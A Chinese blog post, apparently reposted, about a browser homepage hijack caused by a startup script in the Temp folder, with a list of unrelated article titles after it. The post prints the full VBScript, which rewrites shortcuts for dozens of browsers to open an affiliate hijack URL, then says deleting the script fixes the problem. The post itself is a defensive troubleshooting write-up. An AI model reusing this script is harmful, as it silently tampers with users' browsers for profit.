tn=92926678_s_hao_pg之类的跳转劫持解决方案
来源:互联网 发布:网络节点怎么设置 编辑:程序博客网 时间:2024/05/21 19:47
今天打开浏览器,突然发现浏览器地址栏出现了一串后缀
马丹,一看就是被劫持了,我只要一访问这个地址,劫持的人就会收到百度给的钱,,找了半天,发现是
C:\Users\用户名\AppData\Local\Temp下面的一个dat脚本开机启动了,篡改了浏览器的地址
打开脚本
On Error Resume Next:Const link = "http://hao.169x.cn/?v=108":Const link360 = "http://hao.169x.cn/?v=108&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\ChenXin\Desktop,C:\Users\ChenXin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\ChenXin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\ChenXin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\ChenXin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
具体写的什么,我也不大懂,但是看到上面的那几个链接地址,就知道大概是什么意思了!
删掉这个脚本,就解决了问题了
1 0
- tn=92926678_s_hao_pg之类的跳转劫持解决方案
- chrome劫持为http://www.hao123.com/?tn=29065018_114_hao_pg
- linux的dns被劫持(解决方案)
- 关于防止SSL劫持的解决方案
- 简单的ie拦截(ie劫持,ie跳转)vb劫持ie sysdzw
- 网站dns被劫持,网站域名被劫持,域名跳转到别的网站的最新解决方法
- 用这些dns可以摆脱网通,电信之类的运营商搞的dns劫持
- tn和ips的区别
- TN-S TN-C TN-C-S TT IT接地系统的接线图解
- dns服务器缓存与apache的301之类跳转
- 关于互联网流量劫持分析及可选的解决方案
- 关于互联网流量劫持分析及可选的解决方案
- 【网络安全】关于网络劫持的一些客户端解决方案
- 火狐首页被360主页劫持的解决方案
- ips版面与tn的区别
- 关于显示器,神马ips、pls、tn的
- 域名劫持之httpDNS解决方案
- 购物网站被劫持跳转返利推广网站的分析过程和解决方法
- 关于使用adb命令安装apk到手机中的问题
- windows 10安装framework 3.5失败的解决方案
- 测试同时使用JdbcTemplate和HibernateTemplate执行数据更新的事务控制2
- C++栈的初始化,入栈,出栈,获取栈顶元素等操作
- web.xml配置
- tn=92926678_s_hao_pg之类的跳转劫持解决方案
- Java集合类详解
- Windows下忘记mysql的root密码处理
- ios 在已有项目添加CoreData
- libRTMP使用说明
- jQuery是什么?
- 2016
- Run Loop详解
- 【gdkoi2016】【day1t1】【魔卡少女】【cardcaptor】【线段树】